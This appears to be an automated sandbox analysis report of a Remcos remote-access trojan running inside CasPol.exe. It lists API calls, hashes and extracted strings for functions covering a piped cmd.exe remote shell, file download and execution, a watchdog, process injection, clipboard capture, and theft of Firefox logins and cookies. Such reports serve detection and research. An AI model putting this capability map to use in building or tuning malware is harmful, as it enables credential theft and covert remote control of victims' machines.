                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Startup
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                                          • Opcode ID: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                                                                                                                                                          • Instruction ID: 8755cd578eecc9cf916cb98f31ec890f8d4d8ec8e876fe09ba6f20fbb4fb2f80
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 02D0123255C60CCED620ABB4AD0F8A4775CC717616F0403BA6CB5C26D7E6405A2DC2AB
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Deallocatestd::_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1323251999-0
                                                                                                                                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: recv
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1507349165-0
                                                                                                                                                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                                                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: send
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2809346765-0
                                                                                                                                                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                                                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                                                                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                                                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                                          • CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                                                                          • CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
                                                                                                                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                                                          • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0), ref: 004059E4
                                                                                                                                                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                          • String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
                                                                                                                                                                          • API String ID: 2994406822-3565532687
                                                                                                                                                                          • Opcode ID: dcc8b8c9e82c2406b131f58539a7f9a28f87f5a0e426f8ea7cd1a80b9f29def9
                                                                                                                                                                          • Instruction ID: efba9956b6c01968ba48be3e84054341744464a70a9fb060b5e58b4ef4e39929
                                                                                                                                                                          • Opcode Fuzzy Hash: dcc8b8c9e82c2406b131f58539a7f9a28f87f5a0e426f8ea7cd1a80b9f29def9
                                                                                                                                                                          • Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C37D
                                                                                                                                                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C3AD
                                                                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C402
                                                                                                                                                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C463
                                                                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C46A
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                                                                                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                                                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                                                          • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                                                                                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                                          • String ID: 8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                                                                                                                                                          • API String ID: 1067849700-718893278
                                                                                                                                                                          • Opcode ID: fb610a55b1af83ee26860aacf3b2bce4238eb039f9e86e006df5bbc6770c217d
                                                                                                                                                                          • Instruction ID: d596b55e62c6dc406d7f5c06aadeacefb76b4acf2f669351df47ebe9cc805958
                                                                                                                                                                          • Opcode Fuzzy Hash: fb610a55b1af83ee26860aacf3b2bce4238eb039f9e86e006df5bbc6770c217d
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F4282716043016BC604FB76C9579AE77A9AF91348F80483FF582671E2EE7C9908C79B
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                                                          • OpenMutexA.KERNEL32 ref: 00412181
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                                          • String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$xtv
                                                                                                                                                                          • API String ID: 3018269243-1141707176
                                                                                                                                                                          • Opcode ID: ec3e31c72f578fd6444b60f285d95163d7ecc56dd535162fd876ed60357f9545
                                                                                                                                                                          • Instruction ID: 26abbb7e12f392f9fbc718c06b30ae47eaa1113e002934215aad22704783e961
                                                                                                                                                                          • Opcode Fuzzy Hash: ec3e31c72f578fd6444b60f285d95163d7ecc56dd535162fd876ed60357f9545
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C71A23160420167C604FB72CD579AE77A4AE94308F40097FF586A61E2FFBC9945C69E
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                          • API String ID: 1164774033-3681987949
                                                                                                                                                                          • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                                                          • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,h}v,?,h]v), ref: 0040F4C9
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$h]v$h}v$ieinstal.exe$ielowutil.exe$xtv
                                                                                                                                                                          • API String ID: 3756808967-2128172920
                                                                                                                                                                          • Opcode ID: bc99ba9c7543c747694b786fb301b391a6ac372948951d796756b953d2f546da
                                                                                                                                                                          • Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
                                                                                                                                                                          • Opcode Fuzzy Hash: bc99ba9c7543c747694b786fb301b391a6ac372948951d796756b953d2f546da
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                          • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                          • API String ID: 3520204547-604454484
                                                                                                                                                                          • Opcode ID: 4c962c0f3646bba82b373c2adbd36f85a455112de2522dce5665a4225f6141c5
                                                                                                                                                                          • Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c962c0f3646bba82b373c2adbd36f85a455112de2522dce5665a4225f6141c5
                                                                                                                                                                          • Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$Close$File$FirstNext
                                                                                                                                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                          • API String ID: 3527384056-432212279
                                                                                                                                                                          • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                                                          • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 297527592-0
                                                                                                                                                                          • Opcode ID: 99f17da9e7d54f956def1805155cc27ac6796c213d0ac5a717a51dbca6d250a6
                                                                                                                                                                          • Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
                                                                                                                                                                          • Opcode Fuzzy Hash: 99f17da9e7d54f956def1805155cc27ac6796c213d0ac5a717a51dbca6d250a6
                                                                                                                                                                          • Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C37D
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C3AD
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C41F
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C42C
                                                                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C402
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,xtv,00475300,00000001), ref: 0041C44D
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C463
                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C46A
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,xtv,00475300,00000001), ref: 0041C473
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                          • String ID: xtv
                                                                                                                                                                          • API String ID: 2341273852-1469483009
                                                                                                                                                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                                                          Strings
